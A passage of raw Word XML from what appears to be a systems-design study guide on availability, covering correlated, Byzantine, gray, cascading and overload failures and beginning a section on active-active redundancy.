    <w:p w14:paraId="02618E1F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The parallel availability formula </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>only works if failures are independent</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>. If all three replicas fail at the same time for the same reason (correlated failure), the formula breaks completely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7395EC56" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Correlated failure examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59989E79" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>All replicas on the same physical host → host fails, all replicas fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0462D8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>All replicas in the same datacenter → datacenter power failure, all fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7650DEF8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>All replicas running the same OS version → kernel bug triggers simultaneously on all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1786BC85" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>All replicas on the same network switch → switch failure, all lose connectivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FAE780" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>All replicas share the same dependency (e.g., same DNS server, same NTP server) → that dependency fails, all replicas fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028FE149" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The hardest availability engineering challenge is eliminating correlated failures.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> Independent failures are easy — add redundancy. Correlated failures require </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>blast radius analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>failure domain isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C26171" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="5B4C56AA">
          <v:rect id="_x0000_i2148" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1021278A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Failure Modes — What Actually Causes Downtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F68A6F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Understanding availability requires deeply understanding </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how systems fail</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>. Failures are rarely random — they follow patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2729B219" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fail-Stop vs Byzantine Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A22088" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fail-Stop:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> The component stops functioning and makes it obvious — process crashes, connection refused, health check fails. These are the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>easiest failures to handle</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — you detect them quickly and route around them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C6C4C5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Byzantine Failures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> The component continues running but </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>behaves incorrectly</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — returns wrong data, responds slowly, drops some requests, acts non-deterministically. Named after the Byzantine Generals Problem. These are the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hardest failures to handle</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F77785B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Health checks say the component is healthy (it's still running).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05511D25" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Some requests succeed (intermittent failure is hard to detect).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D7BF01" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The failure may be invisible until data corruption is discovered later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C7436F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Example: A database replica whose disk is slowly corrupting, returning wrong data. It responds to health checks. It responds to queries. The data is just wrong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3572CA66" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gray Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCB7310" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A class of failures increasingly recognized in cloud systems. The system is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>partially degraded</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> — not fully down, not fully up. Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B09F5A5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A server responding to health checks but timing out on 30% of actual requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182183B3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A network link that passes ICMP pings but drops TCP segments intermittently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C62BD0" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A database that executes SELECT queries normally but has write latency 100x higher than normal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458BB6D5" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>A cache that returns hits 90% of the time but silently returns stale data 10% of the time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF1F547" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Gray failures are dangerous because monitoring systems often miss them — they don't trigger binary up/down alerts. You need </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>percentile-based latency monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>error rate tracking</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> to detect them. This is why p99 latency monitoring matters more than average latency — gray failures often show up in the tail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5B6DD9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cascading Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A91FB7E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>One of the most devastating failure modes in distributed systems. A partial failure causes increased load on other components, which then fail, causing even more load, in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>runaway feedback loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D69EC8F" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cascade mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A51758" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7D6C4D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Step 1: Database replica 1 fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B09DEF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Step 2: All traffic shifts to replica 2 (now at 200% load)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A7E379" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>Step 3: Replica 2 becomes slow (overloaded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECE3FFE" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Step 4: Application servers time out waiting for replica 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5979E577" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Step 5: Application servers retry → more load on replica 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3464D92D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Step 6: Replica 2 falls over</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEC701D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Step 7: All traffic shifts to replica 3 (now at 300% load)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5895B711" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Step 8: Replica 3 falls over</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029CD94D" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Step 9: System completely down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56491572" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Each failure </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>concentrates</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> load on surviving components, which then fail in turn. A system with three replicas, each designed for 50% load, cannot survive a single replica failure — it collapses like dominoes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC89247" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cascading failure through retries:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> When a service is slow, clients retry. Retries </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multiply the load</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> on the already-struggling service. If each failed request retries 3 times, a service at 100% capacity receives 300% load from retry storms. This is why </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exponential backoff with jitter</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> is mandatory for retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A092CC" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The jitter part is critical:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> If all clients back off for exactly 2 seconds, they all retry simultaneously — a synchronized </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>thundering herd</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> that recreates the same overload condition in waves. Random jitter [0, 2s] spreads retries across time, preventing synchronized stampedes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2C7041" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Overload Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDB46C8" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Systems have capacity limits. When requests exceed capacity, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>latency increases</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>, which causes timeouts, which causes retries, which causes more load. This positive feedback loop is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>overload collapse</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A371FF9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>The counterintuitive behavior: a system at 100% capacity often has </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>worse throughput than at 80% capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> because at 100%, requests spend time waiting in queues, queues fill up, requests are dropped after waiting (wasted capacity), retries amplify load. The system spends more resources managing overload than doing actual work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD291EF" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Little's Law:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t> L = λW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C356F0B" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>L = number of requests in the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F1BE15" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>λ = arrival rate (requests/second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D15F13E" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>W = average time a request spends in the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD48130" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:lastRenderedPageBreak/>
        <w:t>As W increases (higher latency from overload), L increases — more in-flight requests consuming memory, file descriptors, thread pool slots. Eventually resources exhaust and the system crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6CC19C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:pict w14:anchorId="1AA5AF92">
          <v:rect id="_x0000_i2149" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="734C8032" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Redundancy — The Foundation of Availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DEE830" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Redundancy is having </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>more capacity than the minimum required</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>, so failures don't cause outages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7E542C" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active-Active Redundancy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B701AE9" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Multiple instances </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>all handle traffic simultaneously</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>. Load is distributed across all instances. When one fails, others absorb its load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C55174" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3" w:rsidP="00AD5AD3">
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD2D62A" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>All instances must be stateless or have synchronized state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556EC905" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Load balancer must detect failures and redistribute quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1622B4C3" w14:textId="77777777" w:rsidR="00AD5AD3" w:rsidRPr="00AD5AD3" w:rsidRDefault="00AD5AD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5AD3">
        <w:t>Surviving instances must have </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>headroom</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5AD3">
